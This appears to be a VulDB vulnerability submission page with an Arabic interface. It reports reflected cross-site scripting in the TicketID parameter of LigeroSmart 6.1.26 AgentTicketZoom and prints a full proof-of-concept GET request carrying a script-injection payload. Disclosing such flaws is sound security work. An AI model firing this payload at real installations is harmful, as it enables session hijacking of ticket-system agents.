| عنوان | LigeroSmart 6.1.26 Cross Site Scripting |
|---|
| الوصف | It was identified that the Action=AgentTicketZoom parameter allows for cross-site scripting.
GET /otrs/index.pl?Action=AgentTicketZoom;TicketID=1'"</ScRiPt><ScRiPt>alert(document.domain)</ScRiPt> HTTP/1.1
Referer: http://192.168.12.212/otrs/index.pl
Cookie: OTRSAgentInterface=OTTqswkvSB5m4PdnstrzP2OQmENz7920
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Host: 192.168.12.212
Connection: Keep-alive
Docker was installed and tests were performed.
https://github.com/LigeroSmart/docker-ligerosmart |
|---|
| المصدر | ⚠️ https://github.com/LigeroSmart/ligerosmart/issues/279 |
|---|
| المستخدم | chor4o (UID 52584) |
|---|
| ارسال | 02/01/2026 04:04 PM (4 أشهر منذ) |
|---|
| الاعتدال | 16/01/2026 05:38 PM (14 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 341600 [LigeroSmart حتى 6.1.26 index.pl?Action=AgentTicketZoom TicketID البرمجة عبر المواقع] |
|---|
| النقاط | 20 |
|---|